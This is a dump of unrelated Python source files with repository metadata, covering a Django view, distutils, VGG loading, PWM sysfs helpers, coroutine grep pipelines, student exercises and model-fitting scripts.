                post.fileupload = pform.cleaned_data['fileupload']
            # Attach the post to the logged-in user stored in the session.
            uid=request.session.get('uid')
            print(uid)
            user_obj=User.objects.get(pk=uid)
            post.postbyuser=user_obj
            post.save()
        # NOTE(review): an invalid form also falls through to this redirect,
        # silently discarding the submission -- confirm this is intended.
        return redirect('/postapp/showpost/')
# for show post
class posttitle(View):
    """Render the home page with the list of every post."""

    def get(self, request):
        all_posts = Post.objects.all()
        return render(request, 'home.html', {'obj': all_posts})
# show post details
class postdetails(View):
    """Show a single post together with an empty comment form."""

    def get(self, request, id):
        context = {
            'pobj': Post.objects.get(pk=id),
            'form': commentform(),
        }
        return render(request, 'postdetails.html', context)
| [
"ruchamunde@gmail.com"
] | ruchamunde@gmail.com |
878c2b75897dabb57c8c8b8f229f2b4c3c2fda3e | 7823d31688879b2d4dcfd2e3c11fb2c862f35a23 | /AlexNet/cifar/__init__.py | 0e34a0daf85c1391567619a425f9e1606cb30503 | [] | no_license | FMsunyh/dlfive | 7637631f54520673e4ec417b3c02b5334ecdf026 | ffae48aac5ece4de5ff9afccc69b093a72e09637 | refs/heads/master | 2021-09-19T05:59:51.040214 | 2018-07-24T06:29:40 | 2018-07-24T06:29:40 | 108,929,499 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 11/30/2017 10:43 AM
# @Author : sunyonghai
# @File : __init__.py
# @Software: BG_AI
# ========================================================= | [
"fmsunyh@gmail.com"
] | fmsunyh@gmail.com |
497130a66a1d5cb4e762cfd18224838b0a235273 | 3dc647cd07a7361ed401e40d2b7cce8c826c8f6c | /Lib/distutils/command/install_headers.py | 9bb0b18dc0d809dbc03d9ca355818b3bb0af573b | [
"CC-BY-4.0",
"MIT",
"Python-2.0"
] | permissive | RustPython/RustPython | 5ddce4a9848b9de8c041ffd2634f83c0105d3f39 | b864e5da1f18897fc884180b7093df5aa170024f | refs/heads/main | 2023-09-04T12:38:29.458699 | 2023-09-03T12:33:42 | 2023-09-03T12:33:42 | 135,201,145 | 15,815 | 1,302 | MIT | 2023-09-14T08:11:45 | 2018-05-28T19:27:01 | Rust | UTF-8 | Python | false | false | 1,298 | py | """distutils.command.install_headers
Implements the Distutils 'install_headers' command, to install C/C++ header
files to the Python include directory."""
from distutils.core import Command
# XXX force is never used
class install_headers(Command):
    """Distutils command that copies the C/C++ headers listed in
    setup(headers=...) into the Python include directory."""
    description = "install C/C++ header files"
    user_options = [('install-dir=', 'd',
                     "directory to install header files to"),
                    ('force', 'f',
                     "force installation (overwrite existing files)"),
                   ]
    boolean_options = ['force']
    def initialize_options(self):
        # Defaults; install_dir is inherited from 'install' in finalize.
        self.install_dir = None
        self.force = 0
        self.outfiles = []
    def finalize_options(self):
        # Pull install_dir and force from the parent 'install' command
        # when they were not given on the command line.
        self.set_undefined_options('install',
                                   ('install_headers', 'install_dir'),
                                   ('force', 'force'))
    def run(self):
        # Copy each header into install_dir; no-op when none are declared.
        headers = self.distribution.headers
        if not headers:
            return
        self.mkpath(self.install_dir)
        for header in headers:
            (out, _) = self.copy_file(header, self.install_dir)
            self.outfiles.append(out)
    def get_inputs(self):
        # Source files this command would process.
        return self.distribution.headers or []
    def get_outputs(self):
        # Files written by the last run().
        return self.outfiles
| [
"33094578+coolreader18@users.noreply.github.com"
] | 33094578+coolreader18@users.noreply.github.com |
5f51abe52378a636ea41db4efa51780a173e9ad5 | 6b265b404d74b09e1b1e3710e8ea872cd50f4263 | /Python/CodeTesting/Asserts/fac.py | 7572aa64bddf2acdd30e38c0485814ca7db55178 | [
"CC-BY-4.0"
] | permissive | gjbex/training-material | cdc189469ae2c7d43784ecdcb4bcca10ecbc21ae | e748466a2af9f3388a8b0ed091aa061dbfc752d6 | refs/heads/master | 2023-08-17T11:02:27.322865 | 2023-04-27T14:42:55 | 2023-04-27T14:42:55 | 18,587,808 | 130 | 60 | CC-BY-4.0 | 2023-08-03T07:07:25 | 2014-04-09T06:35:58 | Jupyter Notebook | UTF-8 | Python | false | false | 539 | py | #!/usr/bin/env python
def fac(n):
    '''Return n! for a non-negative integer n (asserts on bad input).'''
    assert type(n) == int, 'argument must be integer'
    assert n >= 0, 'argument must be positive'
    product = 1
    for factor in range(2, n + 1):
        product *= factor
    return product
if __name__ == '__main__':
    # Demonstrate fac() on valid inputs 0..4.
    for i in range(5):
        print('{0}! = {1}'.format(i, fac(i)))
    # Invalid inputs (negative, non-integer) trip the argument asserts;
    # show the assertion message instead of crashing.
    for i in [-2, 0.3, 3.0]:
        try:
            print('{0}! = {1}'.format(i, fac(i)))
        except AssertionError as error:
            print('{0}! failed: "{1}"'.format(i, error))
| [
"geertjan.bex@uhasselt.be"
] | geertjan.bex@uhasselt.be |
90e80b34f6a4d3649a476769aa02209fa9c279ee | 2af6a5c2d33e2046a1d25ae9dd66d349d3833940 | /res/scripts/client/gui/shared/gui_items/dossier/achievements/strategicoperationsachievement.py | e881003ec46abf209367c8d18f410da809eed7fb | [] | no_license | webiumsk/WOT-0.9.12-CT | e6c8b5bb106fad71b5c3056ada59fb1aebc5f2b2 | 2506e34bd6634ad500b6501f4ed4f04af3f43fa0 | refs/heads/master | 2021-01-10T01:38:38.080814 | 2015-11-11T00:08:04 | 2015-11-11T00:08:04 | 45,803,240 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 1,075 | py | # 2015.11.10 21:29:19 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/shared/gui_items/dossier/achievements/StrategicOperationsAchievement.py
from abstract import ClassProgressAchievement
from dossiers2.ui.achievements import ACHIEVEMENT_BLOCK as _AB
class StrategicOperationsAchievement(ClassProgressAchievement):
    """Dossier achievement 'strategicOperations' from the rated 7x7 block."""
    def __init__(self, dossier, value = None):
        super(StrategicOperationsAchievement, self).__init__('strategicOperations', _AB.RATED_7X7, dossier, value)
    def getNextLevelInfo(self):
        # Wins still required to reach the next achievement class.
        return ('winsLeft', self._lvlUpValue)
    def _readProgressValue(self, dossier):
        # Current achievement class stored in the rated-7x7 record block.
        return dossier.getRecordValue(_AB.RATED_7X7, 'strategicOperations')
    def _readCurrentProgressValue(self, dossier):
        # Progress towards the next class is the total win count.
        return dossier.getTotalStats().getWinsCount()
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\shared\gui_items\dossier\achievements\strategicoperationsachievement.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2015.11.10 21:29:19 Střední Evropa (běžný čas)
| [
"info@webium.sk"
] | info@webium.sk |
bfb73d4604aeb01237151f4498cf682dc33c7707 | 4ba3a17f53985700de7b9e2c6ef9b9b5f1ad2e8d | /vgg.py | 3557e2cbdec843382f81dba825f678e3eaf7ef5f | [] | no_license | brjathu/style_kernel | fcba958221ba203ad87c8c855726f8d43f7fdd1e | f9c285f38b54132c957bb1543f434a7d2ae3e178 | refs/heads/master | 2021-07-25T19:37:25.174814 | 2017-11-08T02:07:44 | 2017-11-08T02:07:44 | 103,022,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,153 | py | import tensorflow as tf
import numpy as np
import scipy.io
VGG19_LAYERS = (
'conv1_1', 'relu1_1', 'conv1_2', 'relu1_2', 'pool1',
'conv2_1', 'relu2_1', 'conv2_2', 'relu2_2', 'pool2',
'conv3_1', 'relu3_1', 'conv3_2', 'relu3_2', 'conv3_3',
'relu3_3', 'conv3_4', 'relu3_4', 'pool3',
'conv4_1', 'relu4_1', 'conv4_2', 'relu4_2', 'conv4_3',
'relu4_3', 'conv4_4', 'relu4_4', 'pool4',
'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',
'relu5_3', 'conv5_4', 'relu5_4'
)
def load_net(data_path):
    """Load a matconvnet VGG ``.mat`` file.

    Returns (layer weights array, mean pixel), where the mean pixel is the
    normalization image averaged over its spatial axes.
    """
    mat = scipy.io.loadmat(data_path)
    normalization = mat['normalization'][0][0][0]
    return mat['layers'][0], np.mean(normalization, axis=(0, 1))
def net_preloaded(weights, input_image, pooling):
    """Build the VGG-19 feature graph on top of ``input_image``.

    weights: per-layer array as returned by load_net(); pooling: 'avg' or
    anything else for max pooling.  Returns a dict mapping every name in
    VGG19_LAYERS to its output tensor.
    """
    net = {}
    current = input_image
    for i, name in enumerate(VGG19_LAYERS):
        # The first four characters of the layer name encode its type.
        kind = name[:4]
        if kind == 'conv':
            # Unwrap the nested matconvnet cell structure for this layer.
            kernels, bias = weights[i][0][0][0][0]
            # matconvnet: weights are [width, height, in_channels, out_channels]
            # tensorflow: weights are [height, width, in_channels, out_channels]
            kernels = np.transpose(kernels, (1, 0, 2, 3))
            bias = bias.reshape(-1)
            current = _conv_layer(current, kernels, bias)
        elif kind == 'relu':
            current = tf.nn.relu(current)
        elif kind == 'pool':
            current = _pool_layer(current, pooling)
        net[name] = current
    assert len(net) == len(VGG19_LAYERS)
    return net
def _conv_layer(input, weights, bias):
    """Stride-1 SAME-padded 2-D convolution followed by a bias add."""
    conv = tf.nn.conv2d(input, tf.constant(weights), strides=(1, 1, 1, 1),
            padding='SAME')
    return tf.nn.bias_add(conv, bias)
def _pool_layer(input, pooling):
    """2x2 stride-2 SAME pooling: average when pooling == 'avg', else max."""
    pool_op = tf.nn.avg_pool if pooling == 'avg' else tf.nn.max_pool
    return pool_op(input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1),
                   padding='SAME')
def preprocess(image, mean_pixel):
    """Center an image for VGG by subtracting the dataset mean pixel."""
    centered = image - mean_pixel
    return centered
def unprocess(image, mean_pixel):
    """Undo preprocess(): add the dataset mean pixel back onto the image."""
    restored = image + mean_pixel
    return restored
| [
"brjathu@gmail.com"
] | brjathu@gmail.com |
08d9b6d4b9d5aeff1c5b501d48c1cfbe84d1d66f | 52542d7f93a97db5433293781e0b514f5330a127 | /USV_V1/sensor/src/test_ws/sensor_dep/pwm_func.py | 7970ffc38fabc807d658c570608d343aed3e3cb9 | [
"Apache-2.0"
] | permissive | supcon-nzic/USV | 437002ade39a8d4c70930c56127943a707152b83 | 52c97759f97f3222ca5465a5745842cfeb7f26a1 | refs/heads/master | 2022-11-20T11:38:11.783570 | 2020-07-28T01:09:37 | 2020-07-28T01:09:37 | 279,798,518 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,707 | py | # -*- coding: utf-8 -*-
import string
def pwm_export(pwm_num):
    """Export channel 0 of sysfs chip ``pwmchip<pwm_num>`` so that its
    pwm0 control files appear.

    pwm_num: chip number (int or str), spliced into the sysfs path right
    after '/sys/class/pwm/pwmchip' (the first 22 characters).
    """
    pwm_num = str(pwm_num)
    pwm = '/sys/class/pwm/pwmchip/export'
    pwm_dir = pwm[:22] + pwm_num + pwm[22:]
    # Bug fix: the original called ``file_export.close`` without
    # parentheses, so the file was never explicitly closed; ``with``
    # guarantees the write is flushed and the handle released.
    with open(pwm_dir, 'w') as file_export:
        file_export.write('0')
def pwm_unexport(pwm_num):
    """Unexport channel 0 of sysfs chip ``pwmchip<pwm_num>``, removing its
    pwm0 control files.

    pwm_num: chip number (int or str), spliced into the sysfs path right
    after '/sys/class/pwm/pwmchip' (the first 22 characters).
    """
    pwm_num = str(pwm_num)
    pwm = '/sys/class/pwm/pwmchip/unexport'
    pwm_dir = pwm[:22] + pwm_num + pwm[22:]
    # Bug fix: the original called ``file_unexport.close`` without
    # parentheses, so the file was never explicitly closed; ``with``
    # guarantees the write is flushed and the handle released.
    with open(pwm_dir, 'w') as file_unexport:
        file_unexport.write('0')
def pwm_period_config(pwm_num, period):
    """Write ``period`` (nanoseconds) to pwm0 of chip ``pwmchip<pwm_num>``."""
    base = '/sys/class/pwm/pwmchip/pwm0/period'
    period_path = base[:22] + str(pwm_num) + base[22:]
    with open(period_path, 'w') as fh:
        fh.write(str(period))
def pwm_duty_cycle_config(pwm_num, duty_cycle):
    """Write ``duty_cycle`` (nanoseconds) to pwm0 of chip ``pwmchip<pwm_num>``."""
    base = '/sys/class/pwm/pwmchip/pwm0/duty_cycle'
    duty_path = base[:22] + str(pwm_num) + base[22:]
    with open(duty_path, 'w') as fh:
        fh.write(str(duty_cycle))
def pwm_enable(pwm_num):
    """Enable output on pwm0 of chip ``pwmchip<pwm_num>`` (writes '1')."""
    base = '/sys/class/pwm/pwmchip/pwm0/enable'
    enable_path = base[:22] + str(pwm_num) + base[22:]
    with open(enable_path, 'w') as fh:
        fh.write("1")
def pwm_capture(pwm_num):
    """Read the capture node of pwm0 on chip ``pwmchip<pwm_num>``.

    Returns (period, duty_cycle) as integers, parsed from the two
    space-separated fields the kernel exposes in the capture file.
    """
    base = '/sys/class/pwm/pwmchip/pwm0/capture'
    capture_path = base[:22] + str(pwm_num) + base[22:]
    with open(capture_path) as fh:
        fields = fh.read().split(' ')
    return int(fields[0]), int(fields[1])
| [
"qiuyunpeng@nz-ic.com"
] | qiuyunpeng@nz-ic.com |
d6915f891d241df17076fd4aac05f43ece785f6d | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/10/usersdata/73/23003/submittedfiles/testes.py | 946f242d6568fd56d5fe56ac4d96a251e4c428f5 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 388 | py | # -*- coding: utf-8 -*-
from __future__ import division
qs=input('quantidade de salas:')
for i in range (0,qs,1):
sala=[]
sala.append(input('quantidade de vidas da sala:'))
print sala
pe=input('porta de entrada:')
ps=input('porta de saída:')
soma=0
for i in range(sala[pe],sala[ps]+1,1):
a=sala[pe+i]
soma=soma+a
if sala[pe]==sala[ps]:
break
print s | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
522e260b84afd3a41e0c49124e442dacd6830b89 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_055/ch147_2020_04_12_04_04_45_284109.py | 49542792d1c1e1124502b5db7a53e21506d70c53 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | def mais_frequente(lista_palavras):
contagem = {}
for palavra in lista_palavras:
if palavra not in contagem:
contagem[palavra] = 1
else:
contagem[palavra] += 1
max_value = index(max(contagem.values()))
return max_value | [
"you@example.com"
] | you@example.com |
d59bcbbad39d74bcd294b6117bc8ca2b88bc83fe | 4f0385a90230c0fe808e8672bb5b8abcceb43783 | /LNH/day4-teacher/5 面向过程编程.py | 77d4e49cfd933d7a8fd11f330b2d27488f5bcdea | [] | no_license | lincappu/pycharmlearningproject | 4084dab7adde01db9fa82a12769a67e8b26b3382 | b501523e417b61373688ba12f11b384166baf489 | refs/heads/master | 2023-07-10T05:21:15.163393 | 2023-06-29T14:02:35 | 2023-06-29T14:02:35 | 113,925,289 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,798 | py | '''
强调:面向过程编程绝对不是用函数编程那么简单
面向过程的编程思想:核心是过程二字,过程即解决问题的步骤,即先干什么再干什么
基于该思想去编写程序就好比在设计一条流水线,是一种机械式的编程思想
优点:复杂的问题流程化,进而简单化
缺点:可扩展性差
'''
# import os
# g=os.walk(r'C:\Users\Administrator\PycharmProjects\19期\day4\a')
# for dirname,_,files in g:
# for file in files:
# abs_file_path=r'%s\%s' %(dirname,file)
# print(abs_file_path)
#grep -rl 'root' /etc
import os
def init(func):
    """Decorator that primes a coroutine.

    Wraps a generator function so that calling it immediately advances the
    resulting generator to its first ``yield``, making it ready to receive
    values via ``send()``.
    """
    def primed(*args, **kwargs):
        coroutine = func(*args, **kwargs)
        next(coroutine)
        return coroutine
    return primed
def search(filepath,target): # sends each discovered file path downstream, one at a time
    """Walk ``filepath`` and push every file's absolute path (Windows-style
    backslash join) into the ``target`` coroutine."""
    g = os.walk(filepath)
    for dirname, _, files in g:
        for file in files:
            abs_file_path = r'%s\%s' % (dirname, file)
            target.send(abs_file_path)
@init
def opener(target):
    # Pipeline stage: receive a file path, open it in binary mode, and
    # forward (file object, path) to the next stage while it stays open.
    while True:
        abs_file_path=yield
        with open(abs_file_path,'rb') as f:
            target.send((f,abs_file_path))
@init
def cat(target):
    # Pipeline stage: stream the lines of each received file downstream;
    # stop reading the current file as soon as downstream reports a match
    # (a truthy value back from send), mimicking ``grep -l``.
    while True:
        f,abs_file_path=yield
        for line in f:
            res=target.send((line,abs_file_path))
            if res:
                break
@init
def grep(pattern,target):
    # Pipeline stage: when ``pattern`` (as UTF-8 bytes) occurs in a line,
    # forward the file path downstream and yield True back to the sender
    # so it can skip the rest of that file.
    tag=False
    pattern = pattern.encode('utf-8')
    while True:
        line,abs_file_path=yield tag
        tag=False
        if pattern in line:
            target.send(abs_file_path)
            tag=True
@init
def printer():
    # Terminal pipeline stage: print every file path it receives.
    while True:
        abs_file_path=yield
        print(abs_file_path)
search(r'C:\Users\Administrator\PycharmProjects\19期\day4\a',opener(cat(grep('你好',printer()))))
| [
"lincappu@163.com"
] | lincappu@163.com |
38ffb9f0f778b5e8343554b367df1434ad7e94bf | 8fcc27160f8700be46296568260fa0017a0b3004 | /client/dogma/eventCounters.py | abbf36a0815d4c95154b8703ffd3d80fd198ea7f | [] | no_license | connoryang/dec-eve-serenity | 5d867f4eedfa896a4ef60f92556356cafd632c96 | b670aec7c8b4514fc47cd52e186d7ccf3aabb69e | refs/heads/master | 2021-01-22T06:33:16.303760 | 2016-03-16T15:15:32 | 2016-03-16T15:15:32 | 56,389,750 | 1 | 0 | null | 2016-04-16T15:05:24 | 2016-04-16T15:05:24 | null | UTF-8 | Python | false | false | 1,191 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\packages\dogma\eventCounters.py
from contextlib import contextmanager
class EventCount(object):
    """Track, per key, how many Event() contexts are currently active."""

    def __init__(self):
        # key -> number of Event(key) contexts currently in flight
        self.__active = {}

    @contextmanager
    def Event(self, key):
        """Mark ``key`` as happening for the duration of the with-block;
        fire the _OnEvent hook once the block finishes."""
        self._AddEventCount(key)
        try:
            yield
        finally:
            self._DecreaseEventCount(key)
            self._OnEvent(key)

    def _AddEventCount(self, key):
        self.__active[key] = self.__active.get(key, 0) + 1

    def _DecreaseEventCount(self, key):
        remaining = self.__active[key] - 1
        if remaining < 1:
            del self.__active[key]
        else:
            self.__active[key] = remaining

    def IsEventHappening(self, key):
        """Return True when at least one Event(key) context is active;
        a None key is never considered happening."""
        if key is None:
            return False
        return self.__active.get(key, 0) > 0

    def _OnEvent(self, key):
        # Hook for subclasses; called after every Event() context exits.
        pass
pass
class BrainUpdate(EventCount):
    """EventCount that invokes ``callback(key)`` after each event ends."""
    def __init__(self, callback):
        # callback: callable receiving the event key; fired from _OnEvent
        # every time an Event() context exits.
        super(BrainUpdate, self).__init__()
        self.__callback = callback
    def _OnEvent(self, key):
        self.__callback(key)
| [
"masaho.shiro@gmail.com"
] | masaho.shiro@gmail.com |
f989dc9c65e8f3ba691c10722a36b9be7e818a0a | e7bba3dd662bf2778c36a406f72ee93b2ea05e11 | /CardinalityEstimationTestbed/Overall/quicksel/test/python/test_include.py | 4f19223fb4f8307520b7d4b1f74308bb4c36e7ba | [
"Apache-2.0"
] | permissive | TsinghuaDatabaseGroup/AI4DBCode | 37e45b176bc94e77fe250ea45f0ad7b9054c7f11 | a8989bfadcf551ee1dee2aec57ef6b2709c9f85d | refs/heads/master | 2023-07-07T05:42:15.590000 | 2023-07-04T01:04:15 | 2023-07-04T01:04:15 | 217,175,047 | 53 | 35 | null | 2023-06-20T13:00:17 | 2019-10-24T00:03:14 | Scala | UTF-8 | Python | false | false | 688 | py | import sys
sys.path.append('../../src/python')
# isomer = imp.load_source('isomer', '../../src/python/isomer.py')
# import imp
import pprint
from quickSel import isomer
pp = pprint.PrettyPrinter(indent=2)
def Node(query):
    """Wrap a single query in an STHoles 2-D histogram node."""
    return isomer.STHoles2d(query.boundary, [query])
def Query(boundary, freq, uid=None):
    """Shorthand for isomer.Query2d(boundary, freq, uid)."""
    return isomer.Query2d(boundary, freq, uid)
def Boundary(boundary):
    """Shorthand for isomer.Boundary(boundary)."""
    return isomer.Boundary(boundary)
# Monotonically increasing query id, kept in a one-element list so that
# gen_query can mutate it without a ``global`` statement.
qid = [0]
def gen_query(boundary):
    """Build a Query whose frequency equals the area of ``boundary`` and
    assign it the next sequential id."""
    boundary = isomer.Boundary(boundary)
    freq = (boundary.r - boundary.l) * (boundary.t - boundary.b)
    query = Query(boundary, freq, qid[0])
    qid[0] = qid[0] + 1
    return query
| [
"zhouxuan19@mails.tsinghua.edu.cn"
] | zhouxuan19@mails.tsinghua.edu.cn |
a35bae9f502d173b1fff236cf84aff4322441cb5 | a2211f0ef8297a77200a0b2eec8ba3476989b7e6 | /itcast/02_python核心编程/03_网络编程/day03_网络通信过程/demo16_网络通信过程中的MAC地址_IP地址.py | 25e25fb3f3e669b8dbe1ab7815b5d62ae64cb664 | [] | no_license | qq1197977022/learnPython | f720ecffd2a70044f1644f3527f4c29692eb2233 | ba294b8fa930f784304771be451d7b5981b794f3 | refs/heads/master | 2020-03-25T09:23:12.407510 | 2018-09-16T00:41:56 | 2018-09-16T00:42:00 | 143,663,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 458 | py | # 一.通信过程中
# 1.源/目的MAC地址在两个设备间变化
# 2.源/目的IP地址不变
# 二.总结
# 1.MAC地址: 唯一标识数据转发的实际网卡地址
# 2.IP地址: 唯一标识逻辑地址
# 3.网络掩码: 协助确认网络号
# 4.默认网关: 目的IP不在同一网段时, 转发给默认网关
# 5.端口: 唯一标识非同一台设备上的应用
# 6.PED: 唯一标识同一台设备上的应用
| [
"1197977022@qq.com"
] | 1197977022@qq.com |
169f65f33b732b562e5b9cf615068dbd751fd4ed | f39c2c500873180d953ab9a7b22a4f6df95fb1c3 | /Bloomberg/Design Underground System.py | 314a6c31b7b94a5f58dc9fbfad3485ba36f8756c | [] | no_license | Jason003/interview | 458516f671d7da0d3585f89b098c5370edcd9f04 | e153306b85c3687b23a332812a0885d25ecce904 | refs/heads/master | 2021-07-15T15:28:07.175276 | 2021-02-05T03:21:59 | 2021-02-05T03:21:59 | 224,898,150 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,406 | py | '''
经典地铁题,原题解法就不说了,地里也有很多资源。 主要讲下follow up。
国女问了哪些edge case可以导致error, 我说了两种,一是check out的时候id在map中不存在,
二是check out的时候id对应的时间t大于之前之前check in时的时间。国女表示满意,
又问了运行过程中可能出现哪些情况导致地铁出问题。我说可能有些check in了但是把地铁卡弄丢了没有checkout,
id在memory中积压了很多最后导致memory不够。 解决方法是定期检查已经存储的数据,
如果start time间隔很久的就可以直接remove。
三哥也问了一个follow up,因为我在check out的map里存的是route, 如果之后需要该站点名怎么办。
我说在route里可以用station id,然后单独建一个station name到station id的map,三哥表示满意。
'''
import collections
class UndergroundSystem:
    """Track passenger trips and report average travel times per route."""

    def __init__(self):
        # (start station, end station) -> list of trip durations
        self.station_time = collections.defaultdict(list)
        # customer id -> (check-in station, check-in time)
        self.user = {}

    def checkIn(self, id, stationName, t):
        self.user[id] = (stationName, t)

    def checkOut(self, id, stationName, t):
        start_station, start_time = self.user[id]
        self.station_time[(start_station, stationName)].append(t - start_time)

    def getAverageTime(self, startStation, endStation):
        durations = self.station_time[(startStation, endStation)]
        return sum(durations) / len(durations)
"jiefanli97@gmail.com"
] | jiefanli97@gmail.com |
d46a46d06171563485050b9203c957d38c0d0829 | 9f2445e9a00cc34eebcf3d3f60124d0388dcb613 | /2019-11-13-kineticfeatures/hhfitting_minimize_all.py | 65943f142fdd8a7ddda864998cb0f6a72011bff9 | [] | no_license | analkumar2/Thesis-work | 7ee916d71f04a60afbd117325df588908518b7d2 | 75905427c2a78a101b4eed2c27a955867c04465c | refs/heads/master | 2022-01-02T02:33:35.864896 | 2021-12-18T03:34:04 | 2021-12-18T03:34:04 | 201,130,673 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,359 | py | #exec(open('hhfitting_minimize.py').read())
#Using fmin
import h5py
import numpy as np
import matplotlib.pyplot as plt
import os
from scipy import signal
from scipy.optimize import minimize
from scipy.optimize import curve_fit
from scipy.optimize import Bounds
# We do it for cell rCell10070.nwb
# Take from 993 to 5987 idx which is 100.3ms to 599.7ms
# First we extract the trace, then fit individual trace and then in a loop collect for all inf and tau values.
# In another file we check if the model also fits to the deactivation traces.
levelnum = 13
reader = h5py.File('../../Raw_data/Channelpedia/Kv1.1/DataKv1.1RatCHO/rCell10070.nwb')
data = reader['acquisition']['timeseries']['Activation']['repetitions']['repetition2']['data']
leak = np.mean(data[993:5987,4]*1e-9)
G = (np.transpose(data[993:5987,:])*1e-9 - np.transpose(leak))/(np.arange(-0.090,0.090,0.010)+0.0962)[:,None]
Gnorm = G/np.max(G)
t = np.arange(0,len(Gnorm[levelnum])/10000,1/10000)
# plt.figure(1)
# plt.plot(np.transpose(G))
# plt.figure(2)
# plt.plot(data[993:5987,4:15])
# plt.show()
def kineticfunc_array(minfV, mtauV, hinfV, htauV, min, hin, mpow, hpow):
#Assuming that at time=0, the channel is at steady state at -80mV.
m = minfV + (min-minfV)*np.exp(-t/mtauV)
h = hinfV + (hin-hinfV)*np.exp(-t/htauV)
return m**mpow*h**hpow
def error(x):
minfV, mtauV, hinfV, htauV = x
min, hin, mpow, hpow = 0,1,1,1
return np.sum((kineticfunc_array(minfV, mtauV, hinfV, htauV, min, hin, mpow, hpow) - Gnorm[levelnum])**2)
bounds = Bounds([0,0.00001,0,0.0001],[1,1,1,1])
#bb = [(0,100e-8),(0.1),(1e-5,1),(0,1),(1e-4,1)]
# minimum = minimize(error, [3,1,0.005,0.05,0.050,0,1,1,1], method='L-BFGS-B', bounds=bounds)
# minimum = minimize(error, [3,1,0.005,0.05,0.050,0,1,1,1], method='TNC', bounds=bounds)
# minimum = minimize(error, [1,0.005,0.05,0.050,0,1], method='Nelder-Mead', bounds=bounds)
# minimum = minimize(error, [5e-8,1,0.0005,0.25,0.1], method='trust-constr', bounds=bounds)
for level in np.arange(-0.040,0.060,0.010):
levelnum = int((level+0.060)/0.010)
minimum = minimize(error, [1,0.005,0.05,0.050], method='Nelder-Mead', bounds=bounds)
print(minimum.x)
plt.plot(t,Gnorm[levelnum])
plt.plot(t,kineticfunc_array(*minimum.x, *[0,1,1,1]))
# plt.plot(t,kineticfunc_array(*[10e-8,1,0.0005,0.25,0.1], *[0,1,1,1]))
plt.show()
| [
"analkumar2@gmail.com"
] | analkumar2@gmail.com |
2b51bb93386e0ac1b6f86ceadeaa9b0d86f1bacf | e7b6364245adec14cc47cbe5f2206afcba81d734 | /main/models.py | 8cc8cc3d931e5710e1e23fd46cacecd70d4e3f28 | [] | no_license | anaf007/myapp | 255cd3476fe05f9e063c96c3dc535e7089cf317f | 90e2da4a4e0ec1d10620609cfa59f58a78fed08b | refs/heads/master | 2020-03-24T05:14:03.174477 | 2018-08-02T09:33:30 | 2018-08-02T09:33:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | from main.extensions import login_manager
from main.user.models import User
@login_manager.user_loader
def load_user(user_id):
"""Load user by ID."""
return User.get_by_id(int(user_id)) | [
"anaf@163.com"
] | anaf@163.com |
81c8562b87597fa5954ae5a0d9f29bf0e1dc7a0c | b7cb4d7a14b4d15741ca18c7d6159f2e755e49ff | /pysurrogate/util/usage.py | 59a844e65cf5b88dad879e7ee0d08d1e95a0d576 | [
"MIT"
] | permissive | mberkanbicer/pysurrogate | eb270099d452602d41368ae08f0e70d03b945018 | 6fe58f157920ef7819bcd4756342b2ca778f43b8 | refs/heads/master | 2023-03-16T00:46:11.221702 | 2018-09-12T18:26:53 | 2018-09-12T18:26:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,723 | py | import numpy as np
import matplotlib.pyplot as plt
from pysurrogate.optimize import fit, predict
if __name__ == '__main__':
# number of samples we will use for this example
n_samples = 20
# ---------------------------------------------------------
# Example 1: One input variable and one target
# ---------------------------------------------------------
X = np.random.rand(n_samples, 1) * 4 * np.pi
Y = np.cos(X)
# fit the model and predict the data
model = fit(X, Y, n_folds=3, disp=True, normalize_X=True, normalize_Y=True)
_X = np.linspace(0, 4 * np.pi, 1000)
_Y = predict(model, _X)
plt.scatter(X, Y, label="Observations")
plt.plot(_X, _Y, label="True")
plt.show()
# ---------------------------------------------------------
# Example 2: Two input variables and two targets.
# Normalize before building the model and use only an RBF implementation with a specific kernel
# Finally validate the model error on the true function.
# ---------------------------------------------------------
X = (np.random.rand(n_samples, 2) * 200) + 500
func_eval = lambda X: np.concatenate([np.sum(np.square(X), axis=1)[:, None], np.sum(np.sqrt(X), axis=1)[:, None]], axis=1)
Y = func_eval(X)
# fit the model and predict the data
model = fit(X, Y, n_folds=3, disp=True, normalize_X=True, normalize_Y=True)
# create two dimensional data to test the
M = np.meshgrid(np.linspace(100, 200, 1000), np.linspace(100, 200, 1000))
_X = np.concatenate([X[:, :, None] for e in X], axis=2).reshape(n_samples * n_samples, 2)
_Y = predict(model, _X)
print(np.mean(np.abs(_Y - func_eval(_X)), axis=0))
| [
"jules89@arcor.de"
] | jules89@arcor.de |
